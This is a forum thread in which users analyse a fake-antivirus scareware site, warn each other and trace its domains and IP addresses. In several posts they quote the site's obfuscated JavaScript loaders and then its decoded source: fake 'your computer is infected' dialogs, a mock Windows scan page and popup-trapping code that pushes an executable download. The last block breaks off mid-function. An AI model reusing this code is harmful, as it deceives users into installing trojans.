Well you would believe it if you were none the wiser. This is not a computer problem but an heads up to all who surf. Watch out for Nigerians, they seem to be moving on from SPAM Phishing mails to full on viral / trojan infections...

I was looking on the internet for information on ActionScript limitations in character length when being used in background AJAX operations.

As you know, some of the most unexpected domain names can produce the answers you need, I was going through the search results one at a time, most were just parked domains or advert city as I call them when I clicked one link and whammo...

The page I clicked to see instantly directed to an IP only basename URL, the site domain name is registered to some Nigerian in the USA and the bogus windows scanner is based in Holland.

I am laughing because I have Linux.

See attached images.

First your hit with a javascript popup, close it or clicking ok still results in the bogus scanner, then another pop up that shows a window that looks like its issued by windows system and a further warning that your machine remains infected and then your kindly offered an install.exe file for download and your in a constant loop where you can not get away from the download option so you end up closing the browser tab or browser itself. I am guessing that it is more targeted at windows msie.

I am guessing that the background activity I could hear was the result of the FLASH attempting to do something with the system.

The index.html file has what appears to be written in to it an encode system to obfuscate the main script operations, something I am going to look at decoding, the script uses a php script, I assume is the point of attack / loader and the javascript is simply a boot strap for the php script.


}
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript">
//document.write(navigator.userAgent);
</script>
<script type="text/javascript">
var d_e5651bb5 = '6_66c8e0.php'+'?af'+'fid=';

(function() {
var temp="",i,out="";
var x99ce2 = "60,@/115,@/99,@/114,@/105,@/112,@/116,@/32,@/116,@/121,@/112,@/101,@/61,@/34,@/116,@/101,@/120,@/116,@/47,@/106,@/97,@/118,@/97,@/115,@/99,@/114,@/105,@/112,@/116,@/34,@/62,@/118,@/97,@/114,@/32,@/108,@/105,@/115,@/116,@/110,@/97,@/109,@/101,@/32,@/61,@/32,@/110,@/101,@/119,@/32,@/65,@/114,@/114,@/97,@/121,@/40,@/39,@/36,@/119,@/105,@/110,@/110,@/116,@/36,@/39,@/44,@/32,@/39,@/51,@/55,@/39,@/44,@/32,@/39,@/49,@/50,@/53,@/50,@/48,@/56,@/53,@/48,@/39,@/44,@/32,@/39,@/54,@/116,@/111,@/52,@/115,@/118,@/99,@/39,@/44,@/32,@/39,@/97,@/97,@/97,@/97,@/109,@/111,@/110,@/39,@/44,@/13,@/10,@/9,@/9,@/39,@/97,@/97,@/99,@/108,@/105,@/101,@/110,@/116,@/39,@/44,@/32,@/39,@/97,@/98,@/111,@/117,@/116,@/114,@/101,@/112,@/108,@/105,@/103,@/111,@/39,@/44,@/32,@/39,@ in the head of the script body and 1,@/51,@/49,@/54,@/91,@/51,@/93,@/93,@/40,@/49,@/48,@/48,@/48,@/44,@/115,@/99,@/114,@/101,@/101,@/110,@/91,@/95,@/48,@/120,@/51,@/51,@/49,@/54,@/91,@/50,@/93,@/93,@/45,@/50,@/41,@/59,@/119,@/105,@/110,@/100,@/111,@/119,@/91,@/95,@/48,@/120,@/51,@/51,@/49,@/54,@/91,@/52,@/93,@/93,@/40,@/41,@/59,@/125,@/32,@/41,@/40,@/41,@/59,@/60,@/47,@/115,@/99,@/114,@/105,@/112,@/116,@/62,@/";
temp = x99ce2.split(",@/");
for (var i in temp) {
out += String.fromCharCode(temp[i]);
}
document.write(out);
})();

</script>

</head>
<body scroll="no" onselectstart="return false" oncopy="return notcopy()" >

<!--494256787--></body>
</html> at the foot of the index page...

Anyone seen any code like this before?

Yep. It's a fairly typical obfuscation tactic to prevent code-stealing. And, in their case, it looks like they're generating slightly different obfuscations (possibly on the fly) to get the code past the scanners.

Though, it looks like Chrome is aware that the site is malicious ...

I'll also add that it's a fairly shoddy obfuscation tactic. It's not terribly tricky to toss a string into an array, split it, and convert from ascii codes to characters ...

I'll also add that it's a fairly shoddy obfuscation tactic. It's not terribly tricky to toss a string into an array, split it, and convert from ascii codes to characters ...

Yep, I carefully tried to get the server to write a plain text file, it for some reason didn't like being asked to split it up and make the character set.

Chrome is aware yet google who I use to search with still spits it out as a search result... Not very publicly spirited company if google are only looking after its own browser...

I see a warning in the search results. They even show up in Svidgen's custom results (http://staging.svidgen.com/search?cref=http://svidgen.com/cse.xml%3Fversion%3D141&cof=FORID:9&ie=ISO-8859-1&q=89.248.171.58&sa=Search&siteurl=staging.svidgen.com/index). Under the page's main title, it says, "This site may harm your computer." Clicking on that link provides more detail about Google's efforts to fight phishing.

If you're not seeing these notifications in your search results, you may have inadvertently turned them off (not sure if that's possible). Alternatively, updating a search engine that spans as many servers and locales as Google is a fairly high-latency process. It's possible that the update is taking some time to propagate to all of the application servers.

Rest assured, JunkMale: Google has yet to turn malevolent. They are, as of yet, quite interested in "the good."

And by "application servers" I probably meant to type "database servers." But who knows? These types of filters might be applied to local databases on the application servers ... who knows? Not me ...

Well heres a belter, the site still exist but the script delimiters now are generated per load...

<script type="text/javascript" src="res/jquery-1.4.1.min.js"></script>
<script type="text/javascript">
var seq = ["L","u","W","z","K","h","P","k","B","V","U","v","I","A","w","X","T","S","y","j","p","n","a","l","Q","E","N","r","m","t","f","b","q","G","O","R","C","i","e","J","M","Y","H","s","g","D","c","d","F","Z","x","o"], shift = 37;
var d_ddabef4baf4b = 'f_f2ae2a.php'+'?af'+'fid=92800';
var cc = 1, ee = 1;


(function() {
var temp="",i,pass2 = "",sou="";
var x0971a = "60!.^109!.^98!.^73!.^97!.^104!.^119!.^32!.^119!.^122!.^104!.^108!.^61!.^34!.^119!.^108!.^82!.^119!.^ 47!.^75!.^107!.^70!.^107!.^109!.

Ans again

<script type="text/javascript">
var seq = ["H","V","T","X","a","O","Y","i","Q","v","e","G","Z","W","g","s","k","z","r","N","C","S","x","J","p","u","R","j","y","U","M","h","d","L","o","m","B","D","q","t","F","b","K","P","I","A","c","E","f","n","w","l"], shift = 5;
var d_ef2 = 'f_f2ae2a.php'+'?af'+'fid=92800';
var cc = 1, ee = 1;


(function() {
var temp="",i,pass2 = "",sou="";
var xbab690a0c0 = "60,),@@67,),@@108,),@@74,),@@90,),@@85,),@@73,),@@32,),@@73,),@@76,),@@85,),@@115,),@@61,),@@34,),@@ 73,),@@115,),@@106,),@@73,)
And if you notice, it looks like a rolling cypher...

The payload is a "VirtualProtected" windows binary type file. I am guessing that it is designed to take advantage of exploitable browsers / machines.

I notice also that they specifically look for msie, opera and firefox browsers.

So I also guess that the browser or all the browsers on windows machines require a windows .dll which it the point of entry

1337 h4x0rz!

1337 h4x0rz! ... it would appear so.

I would like to look at the payload and see what it is that they are attempting.

Since this last post, the URL obazu1.org now delivers the site that was being masked with the redirector. I have what I assume is the trojan, although I am not going to be asking how to decompile the .exe, I would be interested in finding out what the other component of the attack that is M$ VirtualProtected but I don't have any windows machines, I converted to Linux about a year ago.

Any ideas?

Its getting better, chasing down this guy is not easy...

Seems he has not got... safetytripstyle.net/in.cgi?9 as a redirection to 89.248.171.71 IP address that then forwards on to the hack site.

This time... Oksana Bojko is the person but now... Venezuela... but the safetytripstyle domain appears to be in Turkish, either way your still pushed on to holland and the same hosting company but a different IP address.

So yes, 1337 h4x0rz title is justified IMHO.

My daughter called me and told me that her laptop kept telling her she had a virus so I told her to shut it off until I could get there to check it out. She had gone to one of those MP3 streaming sites, listening to some music she wants at her 11th birthday party and somehow arrived at one of these...

I have got another site like this and I logged into my server (linux) to wget the link.

WARNING... hell, you know what I'm saying:
hxxp://94.102.52.38
--xx is on purpose for obvious reasons

...and here's what I wgot (http://65.5.245.29/source/):

I'm wondering if you (JunkMale) have discovered anything else about the encoded portion of the script? Here is my txt (http://65.5.245.29/source/94.102.52.38.txt)

TBH I haven't been able as yet to spend time with it as I am on other things ATM. If you happen to know of an opensource project that has on offer a tool set that I can look under the hood with then maybe it would speed things up a bit.

As for the thing you got going on... Yep that's the guy.

Makes me laugh it does, windows layout on a linux box... LMAO :)

Welp... I think this MIGHT be what we're looking for!

Crap... post too long!

Okay I'll break it into sections... All this code will be split up into sections and can be pieced back together if needed, by copying and pasting what is in the code boxes.

Here goes:

window.attachEvent('onunload', ext);
(repeated 1 time)
w.resizeTo(x * 10, x * 11 - 7)
(repeated 2 times)
window.showModalDialog(LRUpop, '', popDialogOptions)
(repeated 1 time)

<script language=javascript>var listname = new Array('$winnt$', '37', '12520850', '6to4svc', 'aaaamon', 'aaclient',
'aboutrepligo', 'ac3acm', 'access', 'acctres', 'accwiz', 'acelpd', 'acledit', 'aclui',
'activeds', 'actmovie', 'actxprxy', 'adme', 'admparse', 'admwprox', 'admxprox', 'adptif',
'adsiis', 'adsldp', 'adsldpc', 'adsmsext', 'adsnds', 'adsnt', 'adsnw', 'advapi32',
'advpack', 'agas', 'ahui', 'alg', 'alrsvc', 'amcompat', 'amstream', 'ansi', 'apcups',
'append', 'apphelp', 'appmgmts', 'appmgr', 'appwiz', 'armaccess', 'arp', 'asctrls',
'asferror', 'asfsipc', 'asr_fmt', 'asr_ldm', 'asr_pfu', 'asycfilt', 'at', 'atalaimg2',
'atalais', 'atalctrl', 'athprxy', 'ati2cqag', 'ati2dvag', 'ati2edxx', 'ati2evxx',
'ati2mdxx', 'ati2sgag', 'ati3duag', 'atiddc', 'atidemgr', 'atidemgx', 'atifglpf',
'atiicdxx', 'atiiiexx', 'atikvmag', 'atioglx1', 'atioglx2', 'atioglxx', 'atiok3x2',
'atipdlxx', 'atitvo32', 'ativcoxx', 'ativva5x', 'ativva6x', 'ativvaxx', 'atkctrs', 'atl',
'atl71', 'atlcolor', 'atmadm', 'atmfd', 'atmlib', 'atmpvcno', 'atrace', 'attrib',
'audiodev', 'audiosrv', 'auditusr', 'authz', 'autochk', 'autoconv', 'autodisc', 'autoexec'
, 'autofmt', 'autolfn', 'avicap', 'avicap32', 'avifil32', 'avifile', 'avmeter', 'avtapi',
'avwav', 'basesrv', 'bass', 'modbass32', 'basswma', 'batmeter', 'batt', 'bcgcbpro800',
'bcgcbpro800u', 'bcgpoleacc', 'bidispl', 'bios1', 'bios4', 'bitsprx2', 'bitsprx3',
'blackbox', 'blastcln', 'bootcfg', 'bootok', 'bootvid', 'bootvrfy', 'bopomofo', 'browselc'
, 'browser', 'browseui', 'browsewm', 'bt2k_ins', 'btaudiohelper', 'btbigbmp', 'btbip',
'btcpl', 'btcss', 'btdev', 'bthci', 'bthcrp', 'bthcrpui', 'bthprops', 'bthserv', 'btins',
'btncopy', 'btneighborhood', 'btosif', 'btosif_notes', 'btosif_ol', 'btosif_olx',
'btpanui', 'btprn2k', 'btrez', 'btrezxp', 'btsec', 'btsendto', 'btsendto_ie',
'btsendto_lnagent', 'btsendto_notes', 'btsendto_office', 'btsendto_wab', 'btwhidcs',
'btwiaext', 'btwizard', 'btwpimif', 'btw_ci', 'btxppanel', 'btxpshell', 'c-xls', 'cabinet'
, 'cabview', 'cacls', 'calc', 'camocx', 'capesnpn', 'cards', 'catsrv', 'catsrvps',
'catsrvut', 'ccfgnt', 'ccrpbds6', 'ccrpprg6', 'cdfview', 'cdm', 'cdmodem', 'cdosys',
'cdplayer', 'cdrip3', 'certcli', 'certmgr', 'cewmdm', 'cfgbkend', 'cfgmgr32', 'charmap',
'chcfg', 'chcp', 'chkdsk', 'chkntfs', 'ciadmin', 'ciadv', 'cic', 'cidaemon', 'ciodm',
'cipher', 'cisvc', 'ckcnv', 'clb', 'clbcatex', 'clbcatq', 'cleanmgr', 'cliconf',
'cliconfg', 'clipbrd', 'clipsrv', 'clspack', 'clusapi', 'cmcfg32', 'cmd', 'cmdial32',
'cmdialog', 'cmdl32', 'cmdlib', 'cmdlineext', 'cmmgr32', 'cmmon32', 'cmos', 'cmpbk32',
'cmprops', 'cmsetacl', 'cmstp', 'cmutil', 'cnbjmon', 'cnetcfg', 'cnvfat', 'colbact',
'comaddin', 'comcat', 'comct232', 'comct332', 'comctl', 'comctl2', 'comctl32', 'comdlg32',
'comm', 'command', 'commdlg', 'commtb32', 'comp', 'compact', 'comparefilesx', 'compatui',
'compmgmt', 'compobj', 'compstui', 'comrepl', 'comres', 'comsnap', 'comsvcs', 'comuid',
'config', 'confmsp', 'conime', 'console', 'control', 'convert', 'convlog', 'corpol',
'country', 'credui', 'crtdll', 'crypt32', 'cryptdlg', 'cryptdll', 'cryptext', 'cryptnet',
'cryptsvc', 'cryptui', 'cscdll', 'cscript', 'cscui', 'csh', 'csrsrv', 'csrss', 'csseqchk',
'csvspecialprocessing', 'ctf', 'ctl3d32', 'ctl3dv2', 'ctype', 'c_037', 'c_10000',
'c_10006', 'c_10007', 'c_10010', 'c_10017', 'c_10029', 'c_10079', 'c_10081', 'c_10082',
'c_1026', 'c_1250', 'c_1251', 'c_1252', 'c_1253', 'c_1254', 'c_1255', 'c_1256', 'c_1257',
'c_1258', 'c_20127', 'c_20261', 'c_20866', 'c_20905', 'c_21866', 'c_28591', 'c_28592',
'c_28593', 'c_28594', 'c_28595', 'c_28597', 'c_28598', 'c_28599', 'c_28603', 'c_28605',
'c_437', 'c_500', 'c_737', 'c_775', 'c_850', 'c_852', 'c_855', 'c_857', 'c_860', 'c_861',
'c_863', 'c_865', 'c_866', 'c_869', 'c_874', 'c_875', 'c_932', 'c_936', 'c_949', 'c_950',
'd3d8', 'd3d8caps', 'd3d8thk', 'd3d9', 'd3d9caps', 'd3dim', 'd3dim700', 'd3dpmesh',
'd3dramp', 'd3drm', 'd3dx9_24', 'd3dx9_25', 'd3dx9_26', 'd3dx9_27', 'd3dx9_28', 'd3dx9_29'
, 'd3dx9_30', 'd3dx9_31', 'd3dx9_32', 'd3dxof', 'danim', 'dataclen', 'datime', 'davclnt',
'daxctle', 'dbgeng', 'dbghelp', 'dbmsrpcn', 'dbmsshrn', 'dbmssocn', 'dbnetlib', 'dbnmpntw'
, 'dcache', 'dciman32', 'dcomcnfg', 'ddeml', 'ddeshare', 'ddraw', 'ddrawex', 'debug',
'defrag', 'desk', 'deskadp', 'deskmon', 'deskperf', 'desktop', 'devenum', 'devmgmt',
'devmgr', 'dfrg', 'dfrgfat', 'dfrgntfs', 'dfrgres', 'dfrgsnap', 'dfrgui', 'dfshim',
'dfsshlex', 'dgnet', 'dgrpsetu', 'dgsetup', 'dhcpcsvc', 'dhcpmon', 'dhcpsapi', 'diactfrm',
'diantz', 'diffdoc', 'digest', 'dimap', 'dinput', 'dinput8', 'diskcomp', 'diskcopy',
'diskmgmt', 'diskpart', 'diskperf', 'dispex', 'dllhost', 'dllhst3g', 'dmadmin', 'dmband',
'dmcompos', 'dmconfig', 'dmdlgs', 'dmdskmgr', 'dmdskres', 'dmime', 'dmintf', 'dmloader',
'dmocx', 'dmremote', 'dmscript', 'dmserver', 'dmstyle', 'dmsynth', 'dmusic', 'dmutil',
'dmview', 'dns-sd', 'dnsapi', 'dnsrslvr', 'dnssd', 'docprop', 'docprop2', 'doskey', 'dosx'
, 'dpcdll', 'dplay', 'dplaysvr', 'dplayx', 'dpmodemx', 'dpnaddr', 'dpnet', 'dpnhpast',
'dpnhupnp', 'dpnlobby', 'dpnmodem', 'dpnsvr', 'dpnwsock', 'dpserial', 'dpvacm', 'dpvoice',
'dpvsetup', 'dpvvox', 'dpwsock', 'dpwsockx', 'drake', 'drakecom', 'driverquery',
'drmclien', 'drmstor', 'drmupgds', 'drmv2clt', 'drprov', 'drvssrvr', 'drvvfp', 'drwatson',
'drwtsn32', 'ds16gt', 'ds32gt', 'dsauth', 'dsdmo', 'dsdmoprp', 'dskquota', 'dskquoui',
'dsound', 'dsound3d', 'dsprop', 'dsprpres', 'dsquery', 'dssec', 'dssenh', 'dsuiext',
'dswave', 'dtccm', 'dtctrace', 'dtcutil', 'dumprep', 'dunzip32', 'duser', 'dvdplay',
'dvdupgrd', 'dwwin', 'dx3j', 'dx7vb', 'dx8vb', 'dxdiag', 'dxdiagn', 'dxmasf', 'dxtmsft',
'dxtrans', 'dzip32', 'eblang', 'eblang_407', 'edit', 'edlin', 'efsadu', 'ega', 'ehetw',
'els', 'emptyregdb', 'encapi', 'encdec', 'english', 'eqnclass', 'ersvc', 'es', 'esent',
'esent97', 'esentprf', 'esentutl', 'eudcedit', 'eula', 'eventcls', 'eventcreate',
'eventlog', 'eventquery', 'eventtriggers', 'eventvwr', 'exe2bin', 'expand', 'expsrv',
'exstrace', 'extmgr', 'extrac32', 'exts', 'fastopen', 'faultrep', 'fc', 'fde', 'fdeploy',
'feclient', 'ff_vfw', 'fifx', 'filemgmt', 'filevw80', 'find', 'findstr', 'finger',
'firewall', 'fixmapi', 'fldrclnr', 'fldrvw80', 'fltlib', 'fltmc', 'fm20', 'fm20enu',
'fmifs', 'fntcache', 'fontext', 'fontsub', 'fontview', 'forcedos', 'format', 'framebuf',

Piece 2
'freecell', 'fsmgmt', 'fsquirt', 'fsusd', 'fsutil', 'ftp', 'ftpctrs', 'ftpctrs2',
'ftpsapi2', 'ftsrch', 'fwcfg', 'g711codc', 'gauge32', 'gb2312', 'gcdef', 'gdi', 'gdi32',
'gdiplus', 'geo', 'getmac', 'getuname', 'glmf32', 'glu32', 'gpedit', 'gpkcsp', 'gpkrsrc',
'gpresult', 'gptext', 'gpupdate', 'graftabl', 'graphics', 'grfcxl32', 'grid32', 'grpconv',
'grsapx32', 'gsdll32', 'h323', 'h323log', 'h323msp', 'h5dlg32', 'h5icon32', 'h5krnl32',
'h5menu32', 'h5rtf32', 'h5tool32', 'hal', 'haspdos', 'haspvdd', 'hccoin', 'hdaprop',
'hdashcut', 'hdaudres', 'hdwwiz', 'help', 'hhctrl', 'hhsetup', 'hid', 'hidphone', 'himem',
'hlink', 'hlp95en', 'hnetcfg', 'hnetmon', 'hnetwiz', 'homepage', 'hostname', 'hotplug',
'hpbhealr', 'hpbmmon', 'hpdomon', 'hticons', 'html', 'httpapi', 'htui', 'huffyuv',
'hypertrm', 'i263_32', 'i420vfw', 'iac25_32', 'iacenc', 'iasacct', 'iasads', 'iashlpr',
'iasnap', 'iaspolcy', 'iasrad', 'iasrecst', 'iassam', 'iassdo', 'iassvcs', 'icaapi',
'iccvid', 'icfgnt5', 'icm32', 'icmp', 'icmui', 'iconv', 'icudt20', 'icuin20', 'icuuc20',
'icwdial', 'icwphbk', 'ideograf', 'idq', 'ie4uinit', 'ieakeng', 'ieaksie', 'ieakui',
'iedkcs32', 'ieencode', 'iepeers', 'iernonce', 'iesetup', 'ieuinit', 'iexpress', 'ifmon',
'ifsutil', 'igmpagnt', 'iisext', 'iismap', 'iismui', 'iisreset', 'iisrstap', 'iisrtl',
'iissuba', 'ils', 'imaadp32', 'imagehlp', 'imapi', 'imc32', 'imeshare', 'imgutil', 'imm32'
, 'imon1', 'impact', 'inetcfg', 'inetcomm', 'inetcpl', 'inetcplc', 'inetmib1', 'inetpp',
'inetppui', 'inetres', 'inetsloc', 'inetwh32', 'infoadmn', 'infoctrs', 'infosoft',
'initpki', 'inked', 'input', 'inseng', 'instcat', 'intl', 'iologmsg', 'ipconf', 'ipconfig'
, 'iphlpapi', 'ipmontr', 'ipnathlp', 'ippromon', 'iprop', 'iprtprio', 'iprtrmgr', 'ipsec6'
, 'ipsecsnp', 'ipsecsvc', 'ipsmsnap', 'ipv6', 'ipv6mon', 'ipx32d56', 'ipx32_56',
'ipxmontr', 'ipxpromn', 'ipxrip', 'ipxroute', 'ipxrtmgr', 'ipxsap', 'ipxwan', 'ir32_32',
'ir41_32', 'ir41_qc', 'ir41_qcx', 'ir50_32', 'ir50_qc', 'ir50_qcx', 'irclass', 'irftp',
'irmon', 'irprops', 'isign32', 'isqlext', 'isrdbg32', 'itircl', 'itss', 'iuengine',
'ivfsrc', 'ixpert', 'ixsso', 'iyuv_32', 'java', 'javaaccessbridge', 'javacpl', 'javacypt',
'javaee', 'javaprxy', 'javart', 'javasup', 'javaw', 'javaws', 'jdbgmgr', 'jet500',
'jgaw400', 'jgdw400', 'jgmd400', 'jgpl400', 'jgsd400', 'jgsh400', 'jit', 'jobexec', 'joy',
'jscript', 'jsproxy', 'jview', 'kanji_1', 'kanji_2', 'kb16', 'kbdal', 'kbdaze', 'kbdazel',
'kbdbe', 'kbdbene', 'kbdblr', 'kbdbr', 'kbdbu', 'kbdca', 'kbdcan', 'kbdcr', 'kbdcz',
'kbdcz1', 'kbdcz2', 'kbdda', 'kbddv', 'kbdes', 'kbdest', 'kbdfc', 'kbdfi', 'kbdfi1',
'kbdfo', 'kbdfr', 'kbdgae', 'kbdgkl', 'kbdgr', 'kbdgr1', 'kbdhe', 'kbdhe220', 'kbdhe319',
'kbdhela2', 'kbdhela3', 'kbdhept', 'kbdhu', 'kbdhu1', 'kbdic', 'kbdinbe1', 'kbdinben',
'kbdinmal', 'kbdir', 'kbdit', 'kbdit142', 'kbdkaz', 'kbdkyr', 'kbdla', 'kbdlt', 'kbdlt1',
'kbdlv', 'kbdlv1', 'kbdmac', 'kbdmaori', 'kbdmlt47', 'kbdmlt48', 'kbdmon', 'kbdne',
'kbdnec', 'kbdno', 'kbdno1', 'kbdpl', 'kbdpl1', 'kbdpo', 'kbdro', 'kbdru', 'kbdru1',
'kbdsf', 'kbdsg', 'kbdsl', 'kbdsl1', 'kbdsmsfi', 'kbdsmsno', 'kbdsp', 'kbdsw', 'kbdtat',
'kbdtuf', 'kbdtuq', 'kbduk', 'kbdukx', 'kbdur', 'kbdus', 'kbdusl', 'kbdusr', 'kbdusx',
'kbduzb', 'kbdycc', 'kbdycl', 'kd1394', 'kdcom', 'kerberos', 'kernel32', 'key01',
'keyboard', 'keymgr', 'kmddsp', 'korean', 'krnl386', 'ksproxy', 'ksuser', 'l3codeca',
'l3codecp', 'l3codecx', 'label', 'lameacm', 'lame_acm', 'lame_enc', 'langwrbk', 'lanman',
'laprxy', 'lcppn201', 'lcppn21', 'legitcheckcontrol', 'lhacm', 'libeay32', 'libmysql5a',
'librfc32', 'librfc32u', 'libsapu16', 'licdll', 'licmgr10', 'licwmi', 'lights', 'linkinfo'
, 'lmhsvc', 'lmrt', 'lnkstub', 'loadfix', 'loadperf', 'locale', 'localsec', 'localspl',
'localui', 'locator', 'lodctr', 'logagent', 'loghours', 'login', 'logman', 'logoff',
'logon', 'logonui', 'lpk', 'lpq', 'lpr', 'lprhelp', 'lprmonui', 'lsasrv', 'lsass',
'lusrmgr', 'lz32', 'lzexpand', 'l_except', 'l_intl', 'magnify', 'mag_hook', 'main',
'makecab', 'malslib', 'mapi32', 'mapistub', 'mapisvc', 'mbllnk', 'mcastmib', 'mcd32',
'mcdsrv32', 'mchgrcoi', 'mciavi', 'mciavi32', 'mcicda', 'mciole16', 'mciole32', 'mciqtz32'
, 'mciseq', 'mciwave', 'mdhcp', 'mdimon', 'mdminst', 'mdwmdmsp', 'mem', 'mf3216', 'mfc40',
'mfc40u', 'mfc42', 'mfc42enu', 'mfc42u', 'mfc71', 'mfc71u', 'mfcans32', 'mfcsubs',
'mfcuia32', 'mfcuiw32', 'mfplat', 'mgmtapi', 'mib', 'midimap', 'miglibnt', 'migpwd',
'mimefilt', 'mlang', 'mll_hp', 'mll_mtf', 'mll_qic', 'mm32dcmp', 'mmc', 'mmcbase',
'mmcndmgr', 'mmcshext', 'mmdriver', 'mmdrv', 'mmfutil', 'mmsys', 'mmsystem', 'mmtask',
'mmutilse', 'mnmdd', 'mnmsrvc', 'mobsync', 'mode', 'modemui', 'modex', 'more', 'moricons',
'mountvol', 'mouse', 'mp3fhg', 'mp43decd', 'mp43dmod', 'mp4sdecd', 'mp4sdmod', 'mpeg2data'
, 'mpg2splt', 'mpg4decd', 'mpg4dmod', 'mpg4ds32', 'mplay32', 'mpnotify', 'mpr', 'mprapi',
'mprddm', 'mprdim', 'mprmsg', 'mprui', 'mqad', 'mqbkup', 'mqcertui', 'mqdscli', 'mqgentr',
'mqise', 'mqlogmgr', 'mqoa', 'mqoa10', 'mqoa20', 'mqperf', 'mqperf');
var listras = new Array('inf', 'cpx', 'dll', 'acm', 'cpl', 'exe', 'ax', 'tlb', 'sys',
'ocx', 'xml', 'dat', 'nt', 'rom', 'uce', 'cpl', 'dll', 'nsf', 'exe', 'msc', 'com', 'chm',
'rll', 'srg', 'wsc', 'hlp', 'ram', 'drv', 'hsp', 'tmp', 'nls', 'bin', 'ini', 'cnt', 'vxd',
'cpi', 'dic', 'hxx', 'txt', 'vbs', 'h', 'pro', 'tsp', 'iec', 'qlm', 'sql', 'cmd', 'scr',
'tsk', 'ini', 'ini');
function alert1(){
confirm("
Warning!!! Your computer contains various signs of viruses and \nmalware programs presence
. Your system requires immediate anti \nviruses check! System Security will perform a quic
k and free \nscanning of your PC for viruses and malicious programs.");
}
function alert2(){
confirm("
Your computer remains infected by viruses! They can cause data \nloss and file damages and
need to be cured as soon as possible. \nReturn to System Security and download it secure
to your PC ");
}
function alert3(){
alert("
Your computer remains infected by viruses! They can cause data \nloss and file damages and
need to be cured as soon as possible. \nReturn to System Security and download it secure
to your PC ");
}

Part 3 (10023 characters left so one more after this)

document.title = 'My computer Online Scan';
var my_body = '
<div id="alert"></div> <div id="white" class="white_div" align="center"> <div style="posit
ion:relative;top:50%"><img src="images/page_progressbar.gif" width="51" height="19"/></div
> </div> <div class="left_bar"><div class="left_header">System Tasks</div><div class="left
_box"><div class="left_box_line"><img src="images/i5000000.gif"width="14"height="16"/class
="left_bar_icon"><a href="#">View system information</a></div><div class="left_box_line"><
img src="images/i6000000.gif"width="16"height="16"/class="left_bar_icon"><a href="#">Add o
r remove programs</a></div><div class="left_box_line"><img src="images/i7000000.gif"width=
"16"height="16"/class="left_bar_icon"><a href="#">Change a settings</a></div></div><div cl
ass="left_header">Other Places</div><div class="left_box"><div class="left_box_line"><img
src="images/i1000000.gif"width="16"height="16"/class="left_bar_icon"><a href="#">My Networ
k Places</a></div><div class="left_box_line"><img src="images/i2000000.gif"width="16"heigh
t="16"/class="left_bar_icon"><a href="#">My Documents</a></div><div class="left_box_line">
<img src="images/i3000000.gif"width="16"height="14"/class="left_bar_icon"><a href="#">Shar
ed Documents</a></div><div class="left_box_line"><img src="images/i4000000.gif"width="16"h
eight="16"/class="left_bar_icon"><a href="#">Control Panel</a></div></div><div class="left
_header">Details</div><div class="left_box"><div class="left_box_line"><strong>My Computer
</strong><br/>System Folder</div></div></div> <div class="right_bar"> <div class="right_hr
">System scan progress</div><div class="folder_box"><div id="diskn1"class="trojan none"></
div><img src="images/folder.gif"width="43"height="40"class="folder_icon"/>Shared Documents
</div><div class="folder_box"><div id="diskn2"class="trojan none"></div><img src="images/f
older.gif"width="43"height="40"class="folder_icon"/>My Documents</div><div class="right_hr
">Hard drives</div><div class="folder_box"><div id="diskn3"class="trojan none"></div><img
src="images/hdd.gif"width="43"height="40"class="folder_icon"/>Local Disk(C:)</div><div cla
ss="folder_box"><div id="diskn4"class="trojan none"></div><img src="images/hdd.gif"width="
43"height="40"class="folder_icon"/>Local Disk(D:)</div><div class="right_hr">DVD</div><div
class="folder_box"><img src="images/dvd.gif"width="43"height="40"class="folder_icon"/>DVD
-RAM Drive(E:)</div><div class="progress_bar"><div class="progress_bar_bg"><div class="pro
gress_bar_progress"><div class="progress_bar_gif"></div><div id="progress_proc">0%</div></
div></div></div><div class="file_scanner"><span id="file_scan_text">none</span></div><div
class="window1"><div style="font-size:15px;font-weight:bold;color:white;padding-top:14px;p
adding-left:35px;">Your Computer is Infected!</div><div style="padding-top:22px;">fileinfo
s and actions:</div> <table border="0"><tr><td width="166"class="td_cell1">Name</t
d><td width="105"class="td_cell1">Risk level</td><td width="85"class="td_cell1">Date</td><
td width="120"class="td_cell1">Files infected</td><td width="120"class="td_cell1">State</t
d></tr><tr class="none"id="fileinfo1""> <td class="td_cell2"><img src="images/
qicon.gif" align="absmiddle" style="padding-right:5px"/> <b>Email-Worm.Win32.Net</b></td>
<td class="td_cell2"><b><font color="red">Critical</font></b></td>
<td class="td_cell2">07.13.2009</td> <td class="td_cell2">15</td>
<td class="td_cell2">Waiting removal</td> </tr> <tr class="none" id=
"fileinfo2"> <td class="td_cell2"><img src="images/qicon.gif" align="absmiddle
" style="padding-right:5px"/> <b>Email-Worm.Win32.Myd</b></td> <td class="td_
cell2"><b><font color="red">Critical</font></b></td> <td class="td_cell2">05.1
3.2009</td> <td class="td_cell2">23</td> <td class="td_cell2">Wait
ing removal</td> </tr> <tr class="none" id="fileinfo3"> <t
d class="td_cell2"><img src="images/qicon.gif" align="absmiddle" style="padding-right:5px"
/> <b>Trj-Dwnldr.Win</b></td> <td class="td_cell2"><b><font color="red">Criti
cal</font></b></td> <td class="td_cell2">09.17.2009</td> <td class
="td_cell2">37</td> <td class="td_cell2">Waiting removal</td></tr></table> <di
v style="padding-top:12px;padding-left:12px;width:600px"class="none"id="desc"><b>Descripti
on:</b><br/>This program is potentially dangerous for your system.<b>Trojan-Downloader</b>
stealing passwords,credit cards and other personal information from your computer.<br/><br
/><b>Advice:</b><br/>You need to remove this fileinfo as soon as possible!</div><div style
="padding-top:50px;padding-left:590px"><a href="#">Full system cleanup</a></div></div> </d
iv> ';
function a2way(){
w = window;
ua = navigator.userAgent;
v1 = ua.toLowerCase().indexOf('msie') != - 1 && ua.toLowerCase().indexOf('opera') < 0;
x = 11;
eval('w.resizeTo(x*10,x*11-7)');
w.moveTo(v1 ? (screen.width - 100) >> 1 : 11027, v1 ? (screen.height - 100) >> 1 : 10659
);
}
// --------------------------------------------------------------------------------

And the last bit:

var
exit = true;
var usePopDialog = true;
var popDialogOptions = "dialogWidth:" + screen.width + "px; dialogHeight:" + screen.height
+ "
px; dialogTop:0px; dialogLeft:0px; edge:Raised; center:0; help:0; resizable:1; scroll:1; s
tatus:0";
var popWindowOptions =
"scrollbars=0,menubar=1,toolbar=1,location=0,personalbar=1,status=0,resizable=1";
var usePopDialog = true;
var isXPSP2 = (window.navigator.userAgent.indexOf("SV1") != - 1);
var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
var LRUpop = dow_n_url;
function ext(){
if (exit){
exit = false;
alert3();
if (!isXPSP2 && !usePopDialog){
